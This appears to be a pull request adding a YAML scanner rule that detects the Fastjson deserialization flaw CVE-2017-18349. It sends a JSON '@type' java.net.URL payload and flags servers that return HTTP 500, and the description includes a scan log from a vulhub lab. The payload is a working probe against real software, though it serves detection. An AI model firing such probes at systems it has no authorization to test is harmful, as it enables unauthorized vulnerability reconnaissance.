### PR TITLE
Create poc-yaml-Fastjson-cve-2017-18349-rce

### DIFF
--- a/pocs/poc-yaml-Fastjson-cve-2017-18349
+++ b/pocs/poc-yaml-Fastjson-cve-2017-18349
@@ -1,0 +1,12 @@
+name: poc-yaml-Fastjson-cve-2017-18349
+rules:
+  - method: POST
+    path:
+    headers:
+      Content-Type: application/json
+    body: >-
+      {{"@type":"java.net.URL","val":"dnslog"}:0
+    expression: |
+       response.status == 500 && response.body.bcontains(b"Internal Server Error")
+detail:
+  author: tols&&whale3070


### PR DESCRIPTION
## 本 poc 是检测fastjson小于1.2.24版本的反序列化rce漏洞的

## 测试环境：https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

## 备注：
Enabled plugins: [phantasm]

[INFO] 2021-08-26 14:16:33 [phantasm:phantasm.go:112] found local poc poc-yaml-Fastjason-CVE-2017-18349.yml
[INFO] 2021-08-26 14:16:33 [phantasm:phantasm.go:170] 1 pocs have been loaded (debug level will show more details)
[INFO] 2021-08-26 14:16:33 [default:dispatcher.go:433] processing GET http://192.168.10.130:8090
**[Vuln: phantasm]
Target           "http://192.168.10.130:8090"
VulnType         "poc-Fastjson/default"
author           "tols&&whale3070"**

[*] All pending requests have been scanned